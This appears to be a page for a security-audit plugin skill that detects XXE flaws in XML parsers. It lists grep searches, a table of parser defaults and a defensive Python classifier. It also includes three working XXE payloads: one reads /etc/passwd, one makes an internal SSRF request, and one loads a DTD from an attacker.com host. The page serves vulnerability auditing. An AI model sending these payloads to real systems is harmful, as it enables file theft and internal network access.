From find-cve-agent
Detects XXE vulnerabilities in XML parsers processing untrusted input across JavaScript, TypeScript, Python, Go, Ruby, PHP, Java. Guides auditing configurations, defaults, and input flows for file read/SSRF risks.
npx claudepluginhub byamb4/find-cve-agent
Audit XML processing endpoints, SOAP services, document importers (DOCX/XLSX/SVG), and any code that parses XML from untrusted sources.
file://, http://) -- reads files or makes HTTP requests

Both can exist in the same parser, but they are different vulnerabilities.
```bash
# JavaScript
grep -rn "DOMParser\|XMLParser\|xml2js\|libxmljs\|xmldom\|sax\|saxes" .
# Python
grep -rn "xml\.etree\|lxml\|minidom\|xml\.sax\|defusedxml\|xmltodict" .
# Go
grep -rn "xml\.Decoder\|xml\.Unmarshal\|encoding/xml" .
# Java
grep -rn "DocumentBuilder\|SAXParser\|XMLReader\|TransformerFactory\|SchemaFactory" .
# PHP
grep -rn "simplexml\|DOMDocument\|XMLReader\|xml_parse" .
# Ruby
grep -rn "Nokogiri\|REXML\|Ox\|LibXML" .
```
```bash
grep -rn "FEATURE_SECURE_PROCESSING\|FEATURE_EXTERNAL_ENTITIES\|FEATURE_GENERAL_ENTITIES" .
grep -rn "resolve_entities\|external_entities\|load_external\|noent\|nonet" .
grep -rn "disallow-doctype-decl\|external-general-entities\|external-parameter-entities" .
grep -rn "XXE\|external.*entity\|doctype" .
```
Most modern parsers are SAFE by default. Key exceptions:
| Parser | Default External Entities | Safe? |
|---|---|---|
| xml.etree (Python) | Enabled | UNSAFE |
| xml.sax (Python) | Enabled | UNSAFE |
| lxml (Python) | Disabled | SAFE |
| defusedxml (Python) | Disabled | SAFE |
| encoding/xml (Go) | No entity support | SAFE |
| Nokogiri (Ruby) | Disabled | SAFE |
| REXML (Ruby) | Enabled | UNSAFE |
| libxml2 (C) | Depends on flags | CHECK |
| Java DocumentBuilder | Enabled | UNSAFE |
| PHP simplexml | Depends on libxml2 config | CHECK |
| PHP DOMDocument | Depends on libxml2 config | CHECK |
Does untrusted XML reach the parser? Common sources:
```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
```
```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://internal-server/api/secret">
]>
<root>&xxe;</root>
```
```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<root>test</root>
```
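As an added example (not part of the find-cve-agent skill), the triage helper below inspects a DOCTYPE with Python's stdlib expat bindings without resolving anything, then labels each of the three samples above the way the skill distinguishes them: external general entity reading a file, external general entity making an HTTP request, or parameter entity pulling an external DTD. The `inspect_dtd` and `classify` names and the `DtdFindings` record are this example's own; the sample documents are the three payloads shown above plus one constructed benign document.

```python
import xml.parsers.expat
from dataclasses import dataclass, field
from urllib.parse import urlsplit


@dataclass
class DtdFindings:
    has_doctype: bool = False
    # (kind, entity name, system id) for every declaration pointing outside
    # the document; kind is "doctype", "general" or "parameter"
    external: list = field(default_factory=list)


def inspect_dtd(xml_bytes: bytes) -> DtdFindings:
    """Walk the document with expat while leaving external references
    unresolved: expat fetches an external general entity only when an
    ExternalEntityRefHandler is installed (none is), and parameter-entity
    parsing is pinned to NEVER so an external DTD is not loaded either."""
    findings = DtdFindings()
    parser = xml.parsers.expat.ParserCreate()
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings.has_doctype = True
        if system_id:  # <!DOCTYPE x SYSTEM "..."> references an external DTD
            findings.external.append(("doctype", name, system_id))

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id:  # internal entities carry a value and no system id
            findings.external.append(("parameter" if is_param else "general", name, system_id))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_bytes, True)
    return findings


def classify(xml_bytes: bytes) -> list:
    """One label per external reference: file read, SSRF, or external DTD."""
    labels = []
    for kind, name, system_id in inspect_dtd(xml_bytes).external:
        if kind != "general":
            labels.append(f"external DTD via %{name}; -> {system_id}")
        elif urlsplit(system_id).scheme == "file":
            labels.append(f"file read via &{name}; -> {system_id}")
        else:
            labels.append(f"SSRF via &{name}; -> {system_id}")
    return labels


# Constructed samples: the three payloads from this page plus a benign document.
FILE_READ = b'<?xml version="1.0"?>\n<!DOCTYPE foo [\n<!ENTITY xxe SYSTEM "file:///etc/passwd">\n]>\n<root>&xxe;</root>'
SSRF = b'<?xml version="1.0"?>\n<!DOCTYPE foo [\n<!ENTITY xxe SYSTEM "http://internal-server/api/secret">\n]>\n<root>&xxe;</root>'
EXTERNAL_DTD = b'<?xml version="1.0"?>\n<!DOCTYPE foo [\n<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">\n%xxe;\n]>\n<root>test</root>'
BENIGN = b'<?xml version="1.0"?>\n<root><item>test</item></root>'
```

A production guard would reject any input with `has_doctype` set (the equivalent of `disallow-doctype-decl`) rather than only labelling it; the labels are for ranking findings during the audit.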